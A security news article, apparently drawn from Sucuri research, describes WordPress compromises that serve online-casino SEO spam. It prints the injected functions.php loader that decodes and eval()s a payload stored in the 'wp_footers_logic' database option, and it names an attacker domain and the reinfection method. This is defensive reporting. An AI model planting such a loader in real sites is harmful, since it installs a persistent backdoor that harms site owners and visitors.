“`html
Cybercriminals are progressively targeting websites to insert harmful links while enhancing their search engine optimization standings through elaborate blackhat SEO strategies.
This initiative mainly centers around online casino spam, which has emerged as the most frequent category of spam content impacting compromised websites.
Intruders take advantage of weaknesses in WordPress setups to implant spam content that promotes online casinos, notably those aiming at international regions where gambling is significantly regulated.
The intruders utilize various methods to ensure persistence and avoid detection. They commandeer legitimate website pages by establishing duplicate directories with identical titles, effectively substituting original material with spam-laden landing pages.
When users or search engines seek to access pages, they are diverted to counterfeit directories filled with links to undesirable casino sites.
This method exploits the way Apache and Nginx web servers interpret filesystem paths before forwarding requests to WordPress rewrite engines.
Researchers at Sucuri discovered a notably complex variant of this malware that features several layers of redundancy.
The harmful code is tactically positioned in both theme and plugin files to ensure its persistence even if one part is uncovered.
Instead of generating easily noticeable spam directories, this sophisticated version conceals its payload within the WordPress database using misleading option names.
Multi-Layered Infection Mechanism
The infection proceeds through clever alterations to the database and dynamic content retrieval.
Researchers identified harmful code integrated at the bottom of the theme’s functions.php file.
.webp)
The code fetches a base64-encoded payload from the database using the option name wp_footers_logic and executes it via PHP’s eval() function:
$cloak = get_option('wp_footers_logic');
if ($cloak) {
$decoded = base64_decode($cloak);
eval($decoded);
}If eval() is turned off, the malware records the payload to wp-content/cache/style.dat as a backup solution. The decoded payload tracks incoming requests for particular URL paths, monitoring for cached spam content.
When activated, it retrieves content from domains under the attackers’ control such as browsec[.]xyz. To assure continuity, attackers integrate reinfection code within additional plugin files. This code routinely scans for distinctive indicators.
If indicators are absent, the code automatically re-inserts the malicious payload into the theme’s functions.php file and the primary file of the first active plugin, illustrating advanced SEO spam campaigns.
“`